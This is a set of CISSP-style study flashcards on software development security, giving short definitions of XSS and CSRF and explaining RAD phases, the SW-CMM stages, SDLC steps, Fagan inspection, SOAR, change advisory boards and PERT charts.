Chapter 8: Software Development Security Flashcards
What is XSS ?
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.
What is CSRF ?
In a CSRF attack, an unauthorized party tricks a user into browsing to an attacker’s website while already authenticated to a resource provider (RP). The attacker then exploits a vulnerability in the web application that can’t tell the difference between a request from the user and a request from someone without their consent. This causes the user to unknowingly perform actions.
What are the phases of RAD ?
Per CISSP, Rapid Application Development has 4 phases: Requirements Planning, User Design, Rapid Construction and Cutover.
What is the first stage of SW-CMM?
The first stage of the Software Capability Maturity Model:
Initial – The software process is characterized as ad hoc, and occasionally even chaotic. Few processes are defined, and success depends on individual effort and heroics.
What is the second stage of SW-CMM?
The second stage of the Software Capability Maturity Model:
Repeatable – Basic project management processes are established to track cost, schedule, & functionality. Necessary process discipline in place to repeat earlier successes on projects with similar applications.
What is the third stage of SW-CMM?
The third stage of the Software Capability Maturity Model:
Defined – Software process for both management & engineering activities is documented, standardized, & integrated into all processes for the organization. All projects use the organization’s standard software process for developing & maintaining software.
What is the fourth stage of SW-CMM?
The fourth stage of the Software Capability Maturity Model:
Managed – Detailed measures of the software process & product quality are collected. The software process & products are quantitatively understood & controlled.
What is the fifth stage of SW-CMM?
The fifth stage of the Software Capability Maturity Model:
Optimizing – Continuous process improvement is enabled by quantitative feedback from the process & from piloting innovative ideas & technologies.
What is the “degree” of a database table?
The number of attributes (Fields).
List the steps for SDLC Software Development.
Planning, Requirements, System Analysis, Design, Testing, Deployment, Maintenance
What is Fagan Inspection ?
A structured process for identifying defects in software development documents, such as code, designs, and specifications. The process is named after Michael Fagan, who is credited with inventing formal software inspections.
Which is an asynchronous review process: Pass-around Reviews, or Team Review?
Pass-around.
What is SOAR ?
Security orchestration, automation and response
What is a CAB in software development?
Change Advisory Board
What is a PERT chart ?
Program Evaluation and Review Technique chart, often used at the beginning of a project to identify obstacles, prioritize tasks, and estimate how long it will take to complete each step.